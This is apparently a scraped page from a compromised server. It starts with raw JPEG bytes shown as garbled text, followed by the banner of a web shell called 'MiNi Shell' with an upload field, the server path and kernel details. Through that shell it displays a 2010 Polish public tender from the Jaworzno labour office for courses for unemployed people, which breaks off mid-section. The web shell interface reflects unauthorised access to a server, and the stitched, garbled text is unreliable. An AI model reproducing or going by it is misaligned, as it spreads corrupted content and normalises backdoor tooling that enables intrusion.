JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100317/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100317/58477-N-2010.html

<p class="kh_header"><b>Jaworzno: Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie grupowych szkoleń osób bezrobotnych</b><br>
<b>Numer ogłoszenia: 58477 - 2010; data zamieszczenia: 17.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Jaworznie , ul. Północna 9B, 43-600 Jaworzno, woj. śląskie, tel. 032 6181924, faks 032 6181901.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupjaworzno.internetdsl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie grupowych szkoleń osób bezrobotnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie grupowych szkoleń osób bezrobotnych
w  następujących zakresach: I.  Zakres Sprzedawca z lektoratem języka chińskiego
Ilość osób:  30  w II edycjach (ok. 15 osób w I edycji),
II.  Zakres Podstawy przedsiębiorczości
Ilość osób:  30  w II edycjach (ok. 15 osób w I edycji),
III.  Zakres Szkolenie w zakresie kierowania ruchem drogowym
Ilość osób:   10 w II edycjach (około 5 osób w jednej edycji),
IV.  Zakres Magazynier z obsługą wózków jezdniowych
Ilość osób:  10 w I edycji,
V.  Zakres Operator - kierowca wózka jezdniowego wraz z wymianą butli gazowych
Ilość osób:  10 w I edycji,
VI.  Zakres Operator koparko - ładowarki wszystkie typy klasa III 
Ilość osób: 10 w I edycji,
VII. Zakres Pracownik ochrony fizycznej I stopnia
Ilość osób:  5 w I edycji,
VIII  Zakres Sprzedawca
Ilość osób:  10  w I edycji,
IX Zakres  Prawo jazdy kat. C lub kat. E 
Ilość osób:  10 (zamawiający będzie kierował osoby bezrobotne na szkolenie indywidualnie lub grupowo w zależności od ilości osób zakwalifikowanych na szkolenie),
X. Zakres Uprawnienia elektryczne do 1 kV
Ilość osób: 5 osób w I edycji, 
XI Zakres Szkolenie kierowców wykonujących przewóz drogowy - szkolenie w ramach kwalifikacji wstępnej w zakresie prawa jazdy kat. C lub kat. D 
Ilość osób:  5 w I edycji ,
XII.  Zakres Księgowość z zastosowaniem komputera
Ilość osób:  10 w I edycji,
XIII. Zakres Kucharz małej gastronomii
Ilość osób:  10 w I edycji,
XIV. Zakres Kurs ogólnobudowlany
Ilość osób: 10 osób w I edycji,
XV. Zakres Profesjonalna opiekunka
Ilość osób:  10 w I edycji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku 1.2 wymagane jest by Wykonawca wykazał, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał co najmniej trzy usługi, odpowiadające swoim rodzajem przedmiotowi zamówienia.  W przypadku I. Zakresu Sprzedawca z lektoratem języka chińskiego Zamawiający dopuszcza  również  szkolenia sprzedawcy z modułem innego języka obcego.Zamawiający przy ocenie spełnienia warunków udziału w postępowaniu zastosuje formułę spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia, Wykonawca wyznaczy
do realizacji przedmiotu zamówienia kadrę wykładowczą, składającą się z :
1)wykładowców prowadzących zajęcia teoretyczne posiadających wykształcenie wyższe związane z kierunkiem szkolenia lub wykształcenie wyższe oraz minimum 5 letnie doświadczenie zawodowe
z zakresu objętego szkoleniem. W przypadku zakresu III, IV, V oraz VI Zamawiający dopuszcza możliwość przeprowadzenia szkolenia przez wykładowców posiadających wykształcenie minimum średnie związane z kierunkiem szkolenia lub wykształcenie średnie oraz minimum 5 letnie doświadczenie zawodowe z zakresu objętego szkoleniem. 
2)wykładowców prowadzących zajęcia praktyczne oraz ćwiczenia posiadających co najmniej wykształcenie średnie związane z kierunkiem szkolenia lub wykształcenie średnie oraz minimum 5 letnie doświadczenie zawodowe z zakresu objętego szkoleniem. 
3)wykładowców posiadających co najmniej 2 letnie doświadczenie zawodowe w prowadzeniu zajęć zgodnych z kierunkiem szkolenia; 
4)wykładowców posiadających uprawnienia pedagogiczne lub co najmniej 2 letnie doświadczenie zawodowe w prowadzeniu zajęć dydaktycznych.Zamawiający przy ocenie spełnienia warunków udziału w postępowaniu zastosuje formułę spełnia/ nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Pisemne zobowiązania innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, jeżeli w wykazie, o którym mowa w Rozdziale 6 pkt.3.1 Siwz Wykonawca wykazał wiedzę i doświadczenie, którym będzie dysponował. 	
2. Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, jeżeli w wykazie, o którym mowa w Rozdziale 6 pkt.4.1 Siwz Wykonawca wykazał osoby, którymi będzie dysponował.
3.Oświadczenie Wykonawcy w trybie art. 22 ust. 1 ustawy - Prawo zamówień publicznych - (załącznik nr 5 do SIWZ.)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.60</li>
<li>2 - doświadczenie w prowadzeniu szkoleń - 0.30</li>
<li>3 - posiadanie certyfikatu jakości usług - 0.05</li>
<li>4 - zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 0.05</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmiany umowy, po wzajemnym uzgodnieniu stron, w zakresie:
1)osób prowadzących zajęcia na szkoleniu. Po uzyskaniu pisemnej zgody Zamawiającego, w szczególnie uzasadnionych przypadkach (np. choroba, zgon lub inna sytuacja losowa, której nie można było wcześniej przewidzieć) Wykonawca może dokonać wymiany osób delegowanych do wykonania przedmiotu umowy. W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem, wskazując osobę/y o co najmniej porównywalnych kwalifikacjach.  Jednocześnie Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio z wymiany osób, wyznaczonych przez Wykonawcę do wykonania przedmiotu zamówienia.
2)terminu realizacji przemiotu zamówienia. Po uzyskaniu pisemnej zgody Zamawiającego w szczególnie uzasadnionych przypadkach (np. choroba, zgon lub inna sytuacja losowa, której nie można było wcześniej przewidzieć) Zamawiający może wyrazić zgodę na zmianę terminu. W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem.
3)miejsca przeprowadzenia szkolenia. Po uzyskaniu pisemnej zgody Zamawiającego,
w szczególnie uzasadnionych przypadkach, Wykonawca może dokonać zmiany miejsca przeprowadzenia szkolenia. W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem, wskazując propozycję miejsca szkolenia o co najmniej porównywalnych warunkach. Jednocześnie Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio ze zmiany miejsca szkolenia.
4)ilości osób odbywających szkolenie w poszczególnych edycjach. W szczególnie uzasadnionych przypadkach np. rezygnacja: osoby, która nie rozpoczęła szkolenia, w przypadku niewystarczającej ilości osób  chętnych do odbycia szkolenia itp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pupjaworzno.internetdsl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Jaworznie przy ulicy Północnej 9b, 43-600 Jaworzno, I  piętro, pokój nr 124,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2010 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Jaworznie przy ulicy Północnej 9b, 43-600 Jaworzno, I  piętro, pokój nr 124,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sprzedawca z lektoratem języka chińskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób:  30  w II edycjach (ok. 15 osób w I edycji).
Czas realizacji: nie dłużej niż 10 tygodni. 
Program szkolenia: minimalna ilość godzin - 160, w tym minimum 100 godzin ćwiczeń.
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: sprzedawca, z zakresu: pracownik działu sprzedaży
(kod zawodu: 522107) z następującymi jednostkami modułowymi: 
1)przestrzeganie zasad bezpieczeństwa i higieny pracy w jednostce handlowej - minimum 5 godzin,
2)organizacja handlu w gospodarce rynkowej - minimum 10 godzin,
3)wyposażenie punktu sprzedaży detalicznej - minimum  5 godzin,
4)organizacja zaopatrzenia i przyjmowanie dostaw towarów - minimum 10 godzin,
5)wykonywanie i dokumentowanie podstawowych obliczeń sklepowych - minimum 20 godzin,
6)obsługiwanie klienta, przebieg sprzedaży detalicznej- minimum 10 godziny.
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl. 
2. jednostkę modułową: obsługa kasy fiskalnej - minimum  10 godzin,
3. jednostkę modułową: lektorat języka chińskiego (słownictwo związane z tematem szkolenia) - minimum 90 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Podstawy przedsiębiorczości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób:  30  w II edycjach (ok. 15 osób w I edycji).
Czas realizacji: nie dłużej niż 2 tygodnie. 
Program szkolenia: minimalna ilość godzin - 75, w tym minimum 45 godzin ćwiczeń.
Program szkolenia musi zawierać:
1.jednostkę modułową:  aspekty prawne działalności gospodarczej - minimum 5 godzin teorii,
2.jednostkę modułową: zagadnienia prawne z kodeksu pracy - minimum 5 godzin teorii,
3.jednostkę modułową:  podatki- minimum 5 godzin teorii oraz minimum 5 godzin ćwiczeń,
4.jednostkę modułową: zasady ubezpieczenia w ZUS-ie - minimum 5 godzin teorii oraz minimum 5 godzin ćwiczeń,
5.jednostkę modułową: czynności związane z rozpoczynaniem działalności gospodarczej - minimum 5 godzin teorii oraz minimum 2 godziny ćwiczeń,
6.jednostkę modułową: obsługa komputera - minimum 3 godziny teorii oraz minimum 15 godzin ćwiczeń,
7.jednostkę modułową: biznes plan - minimum 2 godziny teorii oraz minimum 18 godzin ćwiczeń.
Dodatkowe wymagania: Efektem końcowym szkolenia powinno być opracowanie przez uczestnika szkolenia biznes planu (w wersji komputerowej) wraz z pisemną opinią osoby prowadzącej zajęcia z zakresu biznes planu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Szkolenie w zakresie kierowania ruchem drogowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób:   10 w II edycjach (około 5 osób w jednej edycji)
Czas realizacji: nie dłużej niż 3 dni robocze. 
Program szkolenia: Program szkolenia powinien być zgodny z Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji  z dnia 18 lipca 2008r. w sprawie kierowania ruchem drogowym (Dz. U. Nr 132 poz. 839).
Dodatkowe wymagania: Każdy uczestnik szkolenia powinien otrzymać zaświadczenie potwierdzające ukończenie szkolenia zgodnie z wzorem stanowiącym załącznik Nr 4 do powyższego Rozporządzenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 3.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Magazynier z obsługą wózków jezdniowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób:  10 w I edycji.
Czas realizacji: nie dłużej niż 7 tygodni. 
Program szkolenia: minimalna ilość godzin - 210, w tym minimum 100 godzin ćwiczeń
Program szkolenia musi zawierać:
1.modułowy program szkolenia zawodowego dla zawodu: magazynier, z zakresu: praca w handlu hurtowym (kod zawodu: 413103) z następującymi jednostkami modułowymi: 
1)przepisy bhp i p.poż w magazynie - hurtowni- minimum 12 godzin,
2)odbiór towarów- minimum 18 godzin,
3)zasady poprawnego przechowywania towarów- minimum 18 godzin,
4)obsługa programu SUBIEKT dla WINDOWS do prowadzenia gospodarki magazynowej- minimum 35 godzin,
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl. 
2.jednostkę modułową: obsługa kasy fiskalnej - minimum  10 godzin,
3.jednostkę modułową: podstawowe zasady higieny - minimum 10 godzin,
4.jednostkę modułową: obsługa wózków jezdniowych wraz z wymianą butli gazowych- minimum 67 godzin,
5.jednostkę modułową: nowoczesne techniki sprzedaży- minimum 20 godzin,
6.obsługa programu SYMFONIA - minimum 20 godzin.
Część szkolenia dotycząca obsługi wózka jezdniowego ma przygotować uczestników do samodzielnego prowadzenia i obsługi wózka w transporcie wewnątrzzakładowym oraz powinna być przeprowadzona w oparciu
o program opracowany lub zatwierdzony przez jednostkę organizacyjną wyznaczoną przez Ministra właściwego do spraw gospodarki zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 10 maja 2002r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym (Dz. U. Nr 70, poz. 650 z późn. zm) lub równoważny..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 49.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Operator - kierowca wózka jezdniowego wraz z wymianą butli gazowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób:  10 w I edycji.
Czas realizacji: nie dłużej niż 3 tygodnie. 
Program szkolenia: minimalna ilość godzin szkolenia- 67 godzin. Szkolenie ma przygotować uczestników do samodzielnego prowadzenia i obsługi wózka w transporcie wewnątrzzakładowym. Powinno być przeprowadzone
